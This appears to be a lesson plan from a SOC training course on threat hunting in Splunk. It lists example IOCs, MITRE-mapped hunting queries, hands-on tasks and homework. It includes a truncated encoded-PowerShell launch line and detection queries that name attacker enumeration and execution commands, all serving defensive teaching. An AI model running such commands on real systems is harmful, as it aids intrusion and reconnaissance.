β Day 10 β Threat Hunting + IOC Search in Splunk
Today students learn how real SOC analysts hunt threats, not just wait for alerts.
Threat hunting = proactively searching for suspicious activity using IOCs (Indicators of Compromise).
π§ 1. What Is Threat Hunting? (Easy Explanation)
Threat hunting is when SOC analysts:
- Look for unusual activity
- Search for attackers hiding in the network
- Find threats before alerts trigger
Example:
Attackers may bypass antivirus and leave no alerts.
Threat hunters find them using logs + patterns.
π₯ 2. What Are IOCs (Indicators of Compromise)?
IOCs are signs of an attack:
β Bad IP
β Suspicious domain
β Malicious file hash
β Registry changes
β Crypto-mining processes
β Abnormal login patterns
π Examples of IOCs
| Type | Example |
|---|---|
| Malicious IP | 185.234.219.203 |
| Bad Domain | updates-win-service.com |
| File Hash | 44d88612fea8a8f36de82e1278abb02f |
| Malware Process | powershell.exe -nop -enc β¦ |
π 3. IOC Search in Splunk
πΉ Search for malicious IP
index=* 185.234.219.203
πΉ Search for malicious domain
index=* "updates-win-service.com"
πΉ Search for file hash
index=* "44d88612fea8a8f36de82e1278abb02f"
πΉ Search for suspicious process
index=* powershell NOT Microsoft NOT VMtools
πΉ Search for encoded PowerShell
index=* "EncodedCommand"
π 4. Threat Hunting Patterns (MITRE Based)
π₯ Pattern 1 β Credential Access (T1110)
Check failed login spikes:
index=* fail
| timechart count span=1m
π₯ Pattern 2 β Lateral Movement (T1021)
Hunt for RDP logins:
index=* EventCode=4624 Logon_Type=10
π₯ Pattern 3 β Persistence (T1136)
Hunt for new account creation:
index=* EventCode=4720
π₯ Pattern 4 β Execution (T1059)
Hunt for suspicious PowerShell:
index=* powershell "enc" OR "EncodedCommand"
π₯ Pattern 5 β Discovery (T1087)
Hunt for enumerations:
index=* (net user OR net group OR whoami)
π 5. Hands-On Threat Hunt (Students Will Perform)
Task 1 β Find RDP activity in last 24 hours
index=* EventCode=4624 Logon_Type=10 earliest=-24h
Task 2 β Find failed logins from same IP
index=* 4625
| stats count by IpAddress
| where count > 5
Task 3 β Search for encoded PowerShell
index=* "EncodedCommand"
Task 4 β Search for suspicious domains
index=* ".xyz" OR ".top" OR "download"
Task 5 β Hunt for Linux brute-force
index=* "Failed password"
| stats count by src_ip
𧩠6. Threat Hunting Workflow (Teach Students This)
Simple 5-step method for beginners:
1οΈβ£ Start with a question
βIs someone trying to brute force my system?β
2οΈβ£ Collect relevant logs
Windows + Linux + Network
3οΈβ£ Run focused Splunk queries
Use IOCs, patterns, keywords
4οΈβ£ Investigate suspicious events
Identify IPs, users, timestamps
5οΈβ£ Conclude
Threat or no threat?
π€ Trainer Script
βThreat hunting is proactive.
You donβt wait for alerts β you go find the attacker.
Using IOCs and Splunk queries, you can uncover hidden attacks.β
π Homework (Day 10)
Students submit:
- One IOC (IP/domain/hash)
- A Splunk search using that IOC
- MITRE tactic mapping
- One screenshot of search results
"Share Knowledge" 
Leave a comment